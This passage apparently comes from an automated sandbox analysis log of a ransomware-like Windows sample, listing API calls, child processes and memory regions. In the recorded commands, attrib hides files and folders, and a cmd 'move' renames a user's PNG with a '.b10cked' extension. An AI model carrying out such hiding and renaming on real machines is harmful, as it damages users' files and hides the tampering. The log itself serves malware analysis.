dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efec | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", lpProcessInformation=0x26efec*(hProcess=0x4c, hThread=0x50, dwProcessId=0xed8, dwThreadId=0x8b4)) returned 1 [0227.817] CloseHandle (hObject=0x50) returned 1 [0227.817] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0227.817] GetEnvironmentStringsW () returned 0x2e2dc0* [0227.817] FreeEnvironmentStringsW (penv=0x2e2dc0) returned 1 [0227.817] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0228.036] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26eee0 | out: lpExitCode=0x26eee0*=0x0) returned 1 [0228.036] CloseHandle (hObject=0x4c) returned 1 [0228.036] _vsnwprintf (in: _Buffer=0x26f028, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eeec | out: _Buffer="00000000") returned 8 [0228.036] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0228.036] GetEnvironmentStringsW () returned 0x2e2dc0* [0228.036] FreeEnvironmentStringsW (penv=0x2e2dc0) returned 1 [0228.036] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0228.036] GetEnvironmentStringsW () returned 0x2e2dc0* [0228.036] FreeEnvironmentStringsW (penv=0x2e2dc0) returned 1 [0228.036] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef44 | out: lpAttributeList=0x26ef44) [0228.037] GetConsoleTitleW (in: lpConsoleTitle=0x26f328, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.037] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0228.037] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0228.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0228.037] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0228.037] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0228.037] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0228.037] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0228.037] GetConsoleTitleW (in: lpConsoleTitle=0x26f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.038] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef44, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f00c | out: lpAttributeList=0x26ef44, lpSize=0x26f00c) returned 1 [0228.038] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef44, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f004, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef44, lpPreviousValue=0x0) returned 1 [0228.038] GetStartupInfoW (in: lpStartupInfo=0x26ef00 | out: lpStartupInfo=0x26ef00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0228.038] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0228.038] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26efa0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efec | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", lpProcessInformation=0x26efec*(hProcess=0x50, hThread=0x4c, dwProcessId=0x8a0, dwThreadId=0x7dc)) returned 1 [0228.039] CloseHandle (hObject=0x4c) returned 1 [0228.039] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0228.039] GetEnvironmentStringsW () returned 0x2e37f8* [0228.040] FreeEnvironmentStringsW (penv=0x2e37f8) returned 1 [0228.040] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0228.280] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26eee0 | out: lpExitCode=0x26eee0*=0x0) returned 1 [0228.280] CloseHandle (hObject=0x50) returned 1 [0228.280] _vsnwprintf (in: _Buffer=0x26f028, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eeec | out: _Buffer="00000000") returned 8 [0228.280] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0228.280] GetEnvironmentStringsW () returned 0x2e37f8* [0228.280] FreeEnvironmentStringsW (penv=0x2e37f8) returned 1 [0228.280] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0228.281] GetEnvironmentStringsW () returned 0x2e37f8* [0228.281] FreeEnvironmentStringsW (penv=0x2e37f8) returned 1 [0228.281] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef44 | out: lpAttributeList=0x26ef44) [0228.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0228.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.281] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0228.281] SetConsoleInputExeNameW () returned 0x1 [0228.281] GetConsoleOutputCP () returned 0x1b5 [0228.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0228.281] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.281] exit (_Code=0) Process: id = "604" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "603" os_parent_pid = "0xea8" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34239 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34240 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34241 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34242 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34243 start_va = 0xea0000 end_va = 0xea6fff entry_point = 0xea0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34244 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34245 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34246 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34247 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 34248 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34252 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34253 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34254 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 34255 start_va = 0x160000 end_va = 0x1c6fff entry_point = 0x160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34256 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 34257 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34258 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34259 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34260 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34261 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34262 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34263 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34264 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34265 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34266 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34267 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34268 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34269 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 34270 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34271 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 841 os_tid = 0xf4c Process: id = "605" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "603" os_parent_pid = "0xea8" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34273 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34274 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34275 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34276 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34277 start_va = 0x7f0000 end_va = 0x7f6fff entry_point = 0x7f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34278 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34279 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34280 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34281 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34282 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34283 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34284 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34285 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34286 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 34287 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 34288 start_va = 0x6f020000 end_va = 0x6f03cfff entry_point = 0x6f020000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34289 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34290 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34291 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34292 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34293 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34294 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34295 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34296 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34297 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34298 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34299 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34300 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 34301 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34302 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 842 os_tid = 0x8b4 Process: id = "606" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0x8a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "603" os_parent_pid = "0xea8" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34303 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34304 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34305 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34306 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 34307 start_va = 0x4a0000 end_va = 0x4a6fff entry_point = 0x4a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34308 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34309 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34310 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34311 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 34312 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34313 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34314 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34315 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34316 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 34317 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 34318 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34319 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34320 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34321 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34322 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34323 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34324 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34325 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34326 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34327 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34328 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34329 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34330 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 34331 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34332 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 844 os_tid = 0x7dc Process: id = "607" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c60" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOKO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34345 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34346 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34347 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34348 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 34349 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34350 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34351 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 